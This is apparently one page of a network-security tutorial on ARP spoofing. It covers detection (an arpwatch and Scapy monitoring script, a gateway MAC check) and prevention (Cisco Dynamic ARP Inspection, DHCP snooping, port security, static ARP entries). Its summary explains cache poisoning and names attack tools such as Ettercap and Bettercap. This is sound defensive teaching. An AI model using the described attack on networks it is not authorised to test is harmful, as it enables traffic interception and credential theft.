This pattern demonstrates why ARP security is critical even in networks with perimeter defenses—once an attacker has any internal access, ARP spoofing dramatically accelerates compromise.

Shared Network Environments

Detection Methods

Detecting ARP spoofing attacks requires monitoring for anomalous ARP behavior, duplicate MAC addresses, and other indicators of cache poisoning attempts.

ARP Spoofing Detection Techniques
Technique	Mechanism	Effectiveness	Implementation
ARP Watch	Monitor for ARP (IP-MAC) mapping changes	High for detecting changes	arpwatch daemon, custom scripts
Duplicate MAC Detection	Alert when same MAC claims multiple IPs	High for simple attacks	Switch port security, IDS rules
Gratuitous ARP Monitoring	Track unsolicited ARP replies	Medium (false positives from legitimate use)	Network monitoring tools
Gateway MAC Correlation	Verify gateway MAC against known value	High for gateway impersonation	Host-based verification scripts
ARP Rate Limiting	Detect hosts sending excessive ARP traffic	Medium (tuning required)	Switch features, IDS
RARP Verification	Request reverse resolution to verify mappings	Medium (can be spoofed too)	Custom implementations
Traffic Pattern Analysis	Detect traffic flowing through unexpected hosts	Medium (requires baseline)	IDS/NDR systems

arp_detection_examples.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
# Using arpwatch to monitor for ARP changes (Linux)
# Arpwatch logs all ARP IP/MAC bindings and alerts on changes
 
# Install
sudo apt-get install arpwatch
 
# Start monitoring on eth0
sudo arpwatch -i eth0
 
# View logs for suspicious activity
tail -f /var/log/arpwatch.log
 
# Example log entries indicating potential spoofing:
# changed ethernet address 192.168.1.1 00:1a:2b:3c:4d:5e (aa:aa:aa:aa:aa:aa)
# This shows gateway's MAC "changed" - likely an attack!
 
# Manual check: Compare current ARP to expected gateway MAC
# If you know your gateway MAC is 00:1a:2b:3c:4d:5e:
EXPECTED_MAC="00:1a:2b:3c:4d:5e"
CURRENT_MAC=$(arp -n 192.168.1.1 | awk '/192.168.1.1/{print $3}')
if [ "$CURRENT_MAC" != "$EXPECTED_MAC" ]; then
    echo "WARNING: Gateway MAC mismatch! Possible ARP spoofing!"
    echo "Expected: $EXPECTED_MAC"
    echo "Current:  $CURRENT_MAC"
fi
 
# Using Scapy for ARP monitoring (Python)
#!/usr/bin/env python3
from scapy.all import *
 
def arp_monitor(packet):
    if ARP in packet and packet[ARP].op == 2:  # ARP Reply
        # Check if this mapping is expected
        sender_ip = packet[ARP].psrc
        sender_mac = packet[ARP].hwsrc
        print(f"ARP Reply: {sender_ip} -> {sender_mac}")
        # Add validation logic here
 
sniff(filter="arp", prn=arp_monitor, store=0)

Detection Challenges

Defense and Prevention Strategies

Preventing ARP spoofing requires a multi-layered approach combining static configurations, switch-level controls, network segmentation, and endpoint security measures.

Defense Mechanisms

•Static ARP Entries: Manually configure critical IP-to-MAC mappings that cannot be overwritten by dynamic ARP. Most effective for gateways and critical servers. Limited scalability for large networks.
•Dynamic ARP Inspection (DAI): Cisco switch feature that validates ARP packets against DHCP snooping binding database. Dropped if source MAC/IP doesn't match DHCP assignment. Industry standard on managed switches.
•DHCP Snooping: Switch tracks DHCP assignments to build trusted IP-MAC binding table. Foundation for DAI and IP Source Guard. Distinguishes trusted (DHCP server) and untrusted ports.
•Port Security: Limit allowed MAC addresses per switch port. Prevents attacker from having their MAC accepted on the network. Can work with DAI for comprehensive control.
•Private VLANs: Isolate hosts within the same subnet so they cannot communicate directly. Traffic forced through router/firewall even for same-subnet destinations. Prevents layer-2 attacks between isolated hosts.
•802.1X Port Authentication: Require authentication before granting network access. Combined with dynamic VLAN assignment. Reduces attack surface to authenticated users only.
•Network Segmentation: Limit broadcast domain size. ARP only works within broadcast domains. Smaller segments reduce ARP attack impact.
•Encrypted Protocols Only: Even if MITM succeeds, encrypted traffic (TLS, SSH, IPsec) resists inspection. HSTS prevents SSL stripping. Certificate pinning detects impersonation.

cisco_dai_config.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
! Cisco IOS Configuration for ARP Spoofing Prevention
! This shows DAI (Dynamic ARP Inspection) setup with DHCP Snooping
 
! Step 1: Enable DHCP Snooping globally and on VLANs
ip dhcp snooping
ip dhcp snooping vlan 10,20,30
 
! Step 2: Configure trusted ports (uplinks, DHCP servers)
interface GigabitEthernet0/1
 description Uplink to Core
 ip dhcp snooping trust
 ip arp inspection trust
 
interface GigabitEthernet0/2
 description DHCP Server
 ip dhcp snooping trust
 ip arp inspection trust
 
! Step 3: Enable DAI on VLANs
ip arp inspection vlan 10,20,30
 
! Step 4: Configure DAI rate limiting (optional, prevents DoS via ARP flood)
interface range GigabitEthernet0/3 - 48
 description User Access Ports
 ip arp inspection limit rate 15 burst interval 1
 ! 15 ARP packets per second max
 
! Step 5: Additional DAI validation (optional but recommended)
ip arp inspection validate src-mac dst-mac ip
! Validates source/destination MAC in Ethernet matches ARP payload
! Validates IP addresses are not invalid (0.0.0.0, broadcast, etc.)
 
! Step 6: Port Security (complement to DAI)
interface range GigabitEthernet0/3 - 48
 switchport port-security
 switchport port-security maximum 3
 switchport port-security violation restrict
 switchport port-security aging time 120
 
! View DAI statistics
show ip arp inspection statistics
show ip arp inspection vlan 10
show ip dhcp snooping binding

Static ARP Configuration (Defense for Critical Systems):

# Linux: Add static ARP entry for gateway
sudo arp -s 192.168.1.1 00:1a:2b:3c:4d:5e

# Make persistent (add to /etc/network/interfaces or rc.local)
echo "arp -s 192.168.1.1 00:1a:2b:3c:4d:5e" >> /etc/rc.local

# Windows: Static ARP
netsh interface ip add neighbors "Ethernet" 192.168.1.1 00-1a-2b-3c-4d-5e

# Verify static entry (shows PERM or static)
arp -a | grep 192.168.1.1

Static entries are immune to ARP spoofing but require manual management. They're most practical for protecting critical hosts' gateway mappings rather than all network mappings.

Defense in Depth

Summary: ARP Spoofing Mastery

ARP spoofing is one of the most powerful attacks available on local networks, exploiting a fundamental trust assumption in the protocol that bridges IP and Ethernet addressing.

Key Takeaways

•Protocol vulnerability — ARP has no authentication; any device can claim any IP address, and other devices will accept the mapping
•Cache poisoning — Attackers inject false IP-to-MAC mappings into victim ARP caches using spoofed ARP replies, including unsolicited gratuitous ARP
•MITM foundation — ARP spoofing positions attackers to intercept all traffic between victims, enabling credential capture, session hijacking, and data manipulation
•Tool availability — Mature tools (Ettercap, Bettercap, arpspoof) make attacks accessible; also essential for legitimate security testing
•Detection possible — ARP monitoring (arpwatch), duplicate MAC detection, and traffic analysis can identify attacks, though false positives require tuning
•Prevention via switch features — Dynamic ARP Inspection, DHCP Snooping, and Port Security provide enterprise-grade protection on managed switches
•Defense in depth essential — Combine switch controls, network segmentation, static entries for critical hosts, and encrypted protocols for comprehensive protection

What's Next:

Page Complete

2 / 5